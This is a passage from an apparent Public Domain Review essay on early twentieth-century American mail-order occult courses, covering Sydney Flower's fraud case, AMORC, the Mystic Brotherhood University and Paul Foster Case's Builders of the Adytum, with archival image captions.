Advertising testimonials from students supposedly pleased with the mail-order “Series ‘B’” courses offered by Sydney Flower’s Psychic Research Company — [Source](https://iapsop.com/archive/materials/wing_lessons/c1903__research_publishing_co___samples_of_letters_received.pdf): IAPSOP (CC BY-NC).

Flower emerges with almost no trace of a past, but by the time he arrived in Chicago at the turn of the century — where he would collaborate with Herbert Parkyn at the Chicago School of Psychology — America’s so-called second city had become the country’s undisputed hub of metaphysics and personal development, a cosmopolitan crossroads still reverberating with the hum of the 1893 World’s Parliament of Religions and the awe-inspiring appearances of Eastern gurus and spiritual teachers like Swami Vivekananda. Organised by a Swedenborgian lawyer and Unitarian minister, the Parliament assembled a diverse array of leaders from global religions in a landmark attempt to foster interfaith dialogue and introduce non-Christian traditions to American audiences. Flower quickly recognised that, alongside this lather of spiritual curiosity, Chicago’s industrial infrastructure and well-developed transportation links at the heart of a rapidly expanding country could be exploited for esoteric commerce.

[](#img-4)

![Seven men seated and stainding together, some in turbans and robes and others in dark suits, a raised-arm statue visible behind them.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/07-Swami_Vivekananda_at_Parliament_of_Religions-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Religious leaders at the 1893 World’s Parliament of Religions. From left to right: Virchand Gandhi, Hewivitarne Dharmapala, Swami Vivekananda, and (possibly) Gaston Bonet-Maury — [Source](https://commons.wikimedia.org/wiki/File:Swami_Vivekananda_at_Parliament_of_Religions.jpg).

In addition to his courses on voguish practices like hypnotism and clairvoyance, Flower’s 1902 course, *The Mail-Order Business*, guided aspiring entrepreneurs in generating success similar to his own. Described here to readers and deployed elsewhere with relish in his own business, his favourite marketing strategy was the dark art of multiplying corporate identities, of creating new imprints, supposed “departments”, and fictive company names in order to project an illusion of institutional scale and influence. A reader encountering the New Thought Publishing Company, Research Publishing Company, or the Penny Classics series could easily assume that these were each independent bodies, rather than the handiwork of Flower and a few hardworking secretaries. Later, Flower employed an agent by the name of T. W. Henry, who ran the same operation from London to serve European customers, although it was the American market that was most rapidly expanding. Flower created, in effect, an early form of what we might now refer to as “market segmentation”, allowing him to speak to several distinct audiences while maintaining a single underlying operation from the Masonic Temple in Chicago.

While none of this is, strictly speaking, illegal, Flower’s experiments with the mail-order business crossed into outright deceit in 1904, when the Post Office Department brought a case against him for fraudulent financial solicitation. Through his magazine *New Thought*, he had been promoting what he called the “Royal Ten”, an investment scheme that promised implausible fifty percent dividends on a ten-dollar investment. When postal inspectors intervened — charging him with using the mails to defraud — Flower had already vanished, resurfacing in the public record only years later when he was arrested on separate charges related to financial advice given on gold prospecting in 1910.[3](#fn3) Ever the indefatigable entrepreneur, Flower launched a magazine called *The Yogi* while incarcerated and edited eleven issues from his jail cell in Carson City, Nevada.

[](#img-5)

![Ornate banner letterhead for 'New Thought Publishing Co., Ltd.' featuring a central five-pointed star with a single eye at its centre and floral scrollwork.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/08-c1903__new_thought_publishing_co_ltd___flyer_for_the_power_within-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Letterhead for London’s New Thought Publishing Company, a mail-order publisher and distributor of scientific, psychic, and self-culture literature that was founded by Sydney Flower — [Source](https://iapsop.com/archive/materials/wing_lessons/c1903__new_thought_publishing_co_ltd___flyer_for_the_power_within.pdf): IAPSOP (CC BY-NC).

[](#img-6)

![Stock-offer advertisement headed 'Fortune Knocks Once!' showing a large wooden-framed industrial reduction machine above a printed purchase form for North Shore Reduction Company shares.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/09-new_thought_v12_n6_jun_1903-flower-fraud.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Order form that appeared in a June 1903 issue of *New Thought*, which solicits money in exchange for stock in Sydney Flower’s North Shore Reduction Company. It was this kind of solicitation that would later be deemed fraudulent during his 1904 Post Office Department legal trial — [Source](https://iapsop.com/archive/materials/new_thought_chicago/new_thought_v12_n6_jun_1903.pdf): IAPSOP (CC BY-NC).

![Magazine cover titled 'The Yogi,' Vol. 1 No. 1, July, showing a turbaned figure chin-on-hand amid palm fronds in a bold woodcut style.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/10-the-yogi.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of the first issue of *The Yoga: A Magazine of Ferment* (July 1910), which Sydney Flower founded while incarcerated — [Source](http://iapsop.com/archive/materials/yogi_flower/): IAPSOP (CC BY-NC).

Mail-order magic was, perhaps inevitably, an industry vulnerable to charlatans, and postal inspectors found themselves repeatedly entangled with peddlers of flimflam and smoke. But it is important to point out that, despite numerous bad actors, many of these occult organisations operated with a certain spiritual earnestness that earned tens of thousands of followers and students. Their prices were typically modest (even within the context of Depression-era economics), their lessons sincere if occasionally uneven, and their promises more aspirational than exploitative. Many of these publishers operated in the same commercial domain that we would today recognise as self-help literature, and some of the most successful correspondence courses, such as Charles Haanel’s *Master Key System*, first circulated in weekly lessons in 1912, can still be found on the shelves of most mid-sized bookshops. Flower had demonstrated how easily spiritual authority could be amplified through the post, but there were also those occult entrepreneurs who moved in more orderly and austere directions, codifying graded lessons into vast curricula that managed to maintain the spiritual legitimacy that Flower himself had never sustained.

Many of these more ambitious occult correspondence courses drew on the dense symbolic vocabulary of Rosicrucianism and Theosophy, weaving it with the new emerging discipline of psychology in a genuine attempt to democratise personal development through spiritual practice. Rosicrucianism (an esoteric philosophy premised on the notion of a secret network of benevolent healers guiding human affairs) and Theosophy (a syncretic spiritual tradition blending Eastern religious ideas with Western mysticism in an attempt to articulate a universal, perennial wisdom) provided a map to this new breed of spiritual teacher for secret societies that balanced rational self-improvement with richly romantic mythologies. In a country that had been, since the earliest days of the Republic, enamoured of the ideals of bootstrapping individualism, these correspondence courses were enticing models of rational self-development animated by the promise of an esoteric thrill. And by the early 1930s, at a time when economic upheaval had left many Americans searching for stability, the authors and organisers of occult correspondence schools were offering a reassuring path toward inward contentment and outward success beyond the confines of the Christian church.

[](#img-7)

![Promotional booklet cover for 'The Ki-Magi System: The Secret of Power,' showing a robed figure entering a columned Egyptian-style temple, issued by Columbia Scientific Academy.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/11-c1902_columbia_scientific_academy_ki-magi_promotional_materials-cover.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of *The Ki-Magi System: The Secret of Power,* a mail-order pamphlet published by the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

![Booklet cover titled 'Success and How to Win It' showing a classical woman in flowing robes holding a laurel wreath and cornucopia beside a wheel.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/12-success-and-how-to-win-it.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of *Success and How to Win It*, a mail-order pamphlet published by the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

[](#img-8)

![A two-page spread titled 'Authors of Our Course,' presenting ten framed portrait photographs of the course's authors in decorative oval medallions with scrollwork and ribbons.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/13-authors-of-our-course.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

The “ten eminent specialists” who wrote the mail-order courses for the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

One of the most well-known mail-order occult societies of the time, and one which is still in existence today, was the Ancient Mystical Order Rosae Crucis (AMORC), founded in 1915 by advertising agent Harvey Spencer Lewis. Like Sydney Flower, Lewis initially began publishing mail-order courses on popular late-nineteenth-century practices of hypnotism and mesmerism, in works such as *Four Special Lessons in Personal Influence, Hypnotic Suggestion, and Treatment by Suggestion*. What happened next became the cornerstone of AMORC’s foundation story. Lewis claimed that during a visit to Toulouse in 1909 he was initiated into an unbroken Rosicrucian lineage and subsequently instructed to take the tradition to America, where it could be publicly revealed to the properly prepared. While many new religious movements that emerged from the Second Great Awakening had viewed American society as corrupt, fallen, or doomed — and summarily responded by retreating or separating — Lewis’ AMORC moved in the other direction, presenting itself as the continuing current of the secret Rosicrucian order of restorative mendicants whose job was to remain part of the world and to support its healthy growth. As its own literature explained, “the Order is primarily a humanitarian movement, making for greater health, happiness, and peace in the earthly lives of all mankind.” Members, it clarified, were “unselfish servants of God to mankind, efficiently educated, trained, and experienced, attuned with the mighty forces of the Cosmic or Divine Mind, and masters of matter, space, and time.”[4](#fn4) In spite of his mythologising tendencies and a sometimes grandiose cunning, Lewis promulgated a humanistic mysticism grounded in discipline and ethical responsibility, promising not transcendence beyond the world but mastery and harmony within it.

[](#img-9)

![Portrait of H. Spencer Lewis in Rosicrucian regalia, wearing a dark robe patterned with crosses, a white star-marked sash, and a large Rose-and-Cross pendant.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/14-occult_digest_v3_n6_jun_1927-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Harvey Spencer Lewis wearing his “Official Regalia as Imperator of the Rosicrucian Order”, as photographed in a June 1927 issue of *Occult Digest* — [Source](https://iapsop.com/archive/materials/occult_digest/occult_digest_v3_n6_jun_1927.pdf): IAPSOP (CC BY-NC).

![A heavyset mustached man in a three-piece suit sits in a dark chair reading an open book, beside a table lamp with a decorated shade.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/15-H-Spencer-Lewis.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Photograph of Harvey Spencer Lewis, photographer and date unknown — [Source](https://commons.wikimedia.org/wiki/File:Photograph_of_Harvey_Spencer_Lewis.jpg).

A 1933 advertisement from the Mystic Brotherhood University — a Tampa-based group that had recently splintered from AMORC — suggested a striking fusion of esoteric allure and practical self-help. Its eighteen-page mailer served as a recruitment tool, firstly, but also as the initial step toward concrete techniques for navigating everyday life. The cover prominently featured the Rose Cross lamen of a famed nineteenth-century British occult society, the Hermetic Order of the Golden Dawn, while the text claimed sanction from the “Great White Lodge”, an explicit reference to the Theosophical Society’s hierarchy of ascended masters. “This School of Wisdom”, the booklet claimed, “has been ever Cloistered from the World, because it is submissive alone to the Illuminated Government, but from time to time this group of Sages have revealed to the outer World, a pathway, in order to attract man to the great Truths of their Sanctuary.”[5](#fn5) Its lessons often anticipate what would now be described as cognitive-behavioural therapy (CBT) exercises, guiding students to monitor their thoughts, rescript unhelpful patterns, and develop disciplined habits of mindfulness. Long before CBT was codified in the late twentieth century by psychologists such as Aaron Beck and Albert Ellis, occult correspondence courses like these were already drawing — sometimes consciously and sometimes intuitively — on much older traditions of Stoic self-regulation found in Marcus Aurelius’ *Meditations* and the mental discipline advocated by Epictetus. What the Mystic Brotherhood University ultimately offered were therapeutic tools for cultivating moral resolve at a time when many were searching for both practical guidance and transcendental relief.

[](#img-10)

![Booklet cover titled 'The Mystic Brotherhood University, Tampa, Fla.' in blackletter script, framed by plumes of smoke and featuring a central cross covered with occult symbols.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/16-mystic-brotherhood-cross-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of a pamphlet from the Mystic Brotherhood University based in Tampa, Florida, which offered occult correspondence courses, ca. 1930s — [Source](https://iapsop.com/exhibits/mystic_brotherhood/): IAPSOP (CC BY-NC).

![Magazine cover for 'The Mystic Messenger,' September 1937, showing two elaborately costumed figures in tall headdresses facing a pedestal with smoke curling between them.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/17-mystic-messenger-edit.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover of an instalment of “The Mystic Messenger”, a monthly mail-order course from the Mystic Brotherhood University in Tampa, Florida, September 1937 — [Source](https://iapsop.com/archive/materials/mystic_messenger/): IAPSOP (CC BY-NC).

Harvey Spencer Lewis had set the model that others would follow, although not all mail-order occult groups claimed, as Lewis had, a direct historical lineage established through initiation (either real or, more often, fancifully imagined). Mediumistic channelling provided the source material for numerous mail-order occult societies, including Maurice Doreal’s Brotherhood of the White Temple. Like Helena Blavatsky before him, Doreal explained that his teachings had been conveyed to him by disincarnate, super-evolved sages (in his case, from Atlantis), who offered a blend of early Gnosticism and Eastern mysticism, all wrapped in the mass culture idiolect of pulp sci-fi. Doreal’s lessons through the post were hugely popular throughout the mid-century, circulating alongside [the era’s taste for speculative fiction and “weird tales”](https://publicdomainreview.org/essay/charles-fort-and-the-book-of-the-damned/) of reptilian humanoids, ancient astronauts, and sinister secret orders, which helped establish the rubric for many later conspiracy theories. In this overlap, we can see how the sublime realms of mail-order magic could, for some readers, harden into the kinds of conspiratorial worldviews that circulated through the pulp culture of the day.

The mail-order occult societies that withstood the test of time were those with the most internally consistent cosmologies, and which either sought to reanimate the prevailing esoteric currents of the seventeenth to nineteenth centuries or, alternatively, moved in the other direction toward psychology and the philosophy of mind. Paul Foster Case’s Builders of the Adytum attempted to do both. It was in Chicago at the turn of the century, the time and place of so many occult conversions, that Case met Sydney Flower’s collaborator and best-selling occult writer William Walker Atkinson, and shortly thereafter joined the Alpha et Omega lodge, a splinter group of the incense-trailed Hermetic Order of the Golden Dawn, where he quickly rose through its degrees. The fact that Case was initiated into an established and deeply influential occult society underscores a broader truth about this milieu: in most other instances, its histories rest less on verifiable lineage than on the fleeting appearance of a half-seen (and presumably fictitious) order that surfaced only long enough to confer legitimacy on the next seeker in line, a fitting reminder of how fragile and fluid spiritual authority could be within the mail-order occult world.

[](#img-11)

![Blue-gray notebook page headed 'Introduction to Tarot,' filled with handwritten blue-ink study notes on Key 8 Strength and Key 9 Hermit with page-number references.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/18-PaulFosterCase-Bota-IntroductionToTarot-1922_0069.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover (with a reader’s annotations) of the fifth mail-order pamphlet published by Paul Foster Case in the “Introduction to Tarot” series — [Source](https://archive.org/details/PaulFosterCase-Bota-IntroductionToTarot-1922/page/n174/mode/thumb).

![Blue-gray notebook page headed 'Introduction to Tarot,' covered with handwritten blue-ink notes on Key 10 Wheel of Fortune, listing Kaph, ROTA, Hermanubis, and Sphinx.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/19-PaulFosterCase-Bota-IntroductionToTarot-1922_0085.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

Cover (with a reader’s annotations) of the sixth mail-order pamphlet published by Paul Foster Case in the “Introduction to Tarot” series — [Source](https://archive.org/details/PaulFosterCase-Bota-IntroductionToTarot-1922/page/n174/mode/thumb).

In 1922, Case established the School of Ageless Wisdom in Los Angeles, which later evolved into Builders of the Adytum (BOTA), an organisation that remains active today. In contrast to the theatrical and often exaggerated claims of some of his predecessors, Case’s method was rigour and discipline, with weekly lessons combining theoretical knowledge of the Kabbalah and tarot with practical exercises in meditation and visualisation, contemplative traditions that were still rare outside of the confines of Christian prayer. Ultimately, BOTA wasn’t teaching the tarot as a method of divination but as a path of self-development with a staunch Protestant work ethic. “You will find yourself developing greater ability to concentrate”, he explains in the opening lesson. “Your perceptions will be keener. You will deepen and broaden your comprehension of yourself, and of the meaning of your various experiences.”[6](#fn6) A central feature of BOTA’s early teaching was the memorisation of what Case termed “The Pattern on the Trestle Board”, or simply “The Pattern”, ten aphoristic statements on spiritual self-reliance and sacred responsibility that functioned for members as both a moral code and a cognitive scaffold to the ten sephirah on the Kabbalah’s Tree of Life diagram. For BOTA students, there were few grand pronouncements and no conspiratorial tease. What BOTA offered, instead, were philosophically inclined treatments of the ancient mystical tradition of Kabbalah and the more recent but still conceptually ornate practice of tarot, offering influential and authoritative interpretations of both.

One of the defining features of the mail-order occult societies that proliferated in the early twentieth century was their ability to signpost routes through not just economic depression and global war, but through the deeper, subtler affliction of the modern condition itself. In a world increasingly flattened by industrial rationalism and the conveyor belt of routinised labour, mail-order magic offered an undoubtedly seductive counter-current. In his now-classic diagnosis of the malaise of modern American life, *The Culture of Narcissism* (1979), Christopher Lasch argued that “people today hunger not for personal salvation, let alone for the restoration of an earlier golden age, but for the feeling, the momentary illusion, of personal well-being, health, and psychic security.”[7](#fn7) In many ways, mail-order magic anticipated this shift. Esoteric cosmologies and metaphysical systems that had once promised access to occult wisdom were being steadily reframed as tools of Stoic self-regulation, and correspondence courses such as these became one therapeutic tool among many for managing the pressures of modernity at a time when organised mainstream religion was slouching out of view.

[](#img-12)

![Line drawing of a mustached man in a striped suit with arms raised beneath an arc of words: anger, vanity, appetite, temptation, and impatience.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/20-magnetic-man.jpg?width=1200&height=765)Scroll through the whole page to download all images before printing.

“The magnetic man welcomes forces that others dread, because he can extract a precious power therefrom”, diagram from *A Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of the mail-order “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=27).

What the mail-order mages had ultimately recognised was that the modern man and woman no longer necessarily sought a metaphysics to explain the cosmos and their place within it, but a personal metaphysics that could diagnose themselves through a recognisably American lens of radical subjectivity and self-reliance. What is lost in all this, perhaps, is the seriousness of the quest: the sense that one’s spiritual practice — whether liturgical or magical, devotional or divinatory — isn’t simply a method of self-soothing but a sincere gesture toward a transcendental world that exceeds us. Many of the customers who responded to those magazine ads were in search of genuine transcendence and were offered, instead, a commodified and reproducible illusion of initiation.

The text of this essay is published under a [CC BY-SA](https://creativecommons.org/licenses/by-sa/4.0/) license, see [here](https://publicdomainreview.org/legal#reusing-our-articles) for details.

